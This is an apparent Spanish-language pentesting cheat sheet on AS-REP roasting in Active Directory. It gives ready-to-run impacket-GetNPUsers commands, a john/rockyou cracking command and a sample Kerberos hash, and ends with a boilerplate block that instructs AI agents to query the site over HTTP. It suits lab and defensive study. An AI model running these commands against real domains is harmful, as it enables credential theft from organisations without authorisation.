# ASREProast

ASREProast se basa en solicitar **respuestas AS-REP** de usuarios que **no requieren preautenticación** y crackear el hash offline.

**Requisitos:**

* NO necesitas contraseña ni credenciales válidas.
* Solo necesitas una **lista de usuarios** y que alguno tenga **preauth desactivado**.

**Explicación:** Si un usuario tiene desactivada la preautenticación Kerberos (una mala práctica), el controlador devuelve directamente un paquete cifrado con la clave del usuario. Ese paquete puede ser crackeado.

#### Conseguir TGT sin credenciales

```
impacket-GetNPUsers dominio.com/ -no-pass -usersfile users.txt
```

Y crackeamos el Hash offline:

```
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

<figure><img src="/files/u8T0NOsnyRFg0MNU7NT8" alt=""><figcaption></figcaption></figure>

#### Usuarios con la opción "Do not require Kerberos pre-authentication" habilitada

* Obtiene: Hashes crackeables de los **TGTs** (Ticket Granting Tickets)

```
impacket-GetNPUsers -dc-ip 172.16.157.6 -request -outputfile hashes2 relia.com/jim
```

#### Mecanismo:

1. Identifica usuarios que no requieren pre-autenticación
2. Solicita un TGT para ese usuario
3. El KDC devuelve el TGT cifrado con la contraseña del usuario
4. Captura el hash para crackeo offline

#### Cuándo usarlo:

* Cuando encuentres usuarios con `DONT_REQ_PREAUTH` en bloodhound
* Al principio de la enumeración
* Usuarios privilegiados que puedan tener esta mala configuración

#### Salida esperada:

```
$krb5asrep$23$jim@RELIA.COM:ae45f... (hash crackeable con hashcat/john)
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alv-fh.gitbook.io/alv-fh/active-directory-methodology/asreproast.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.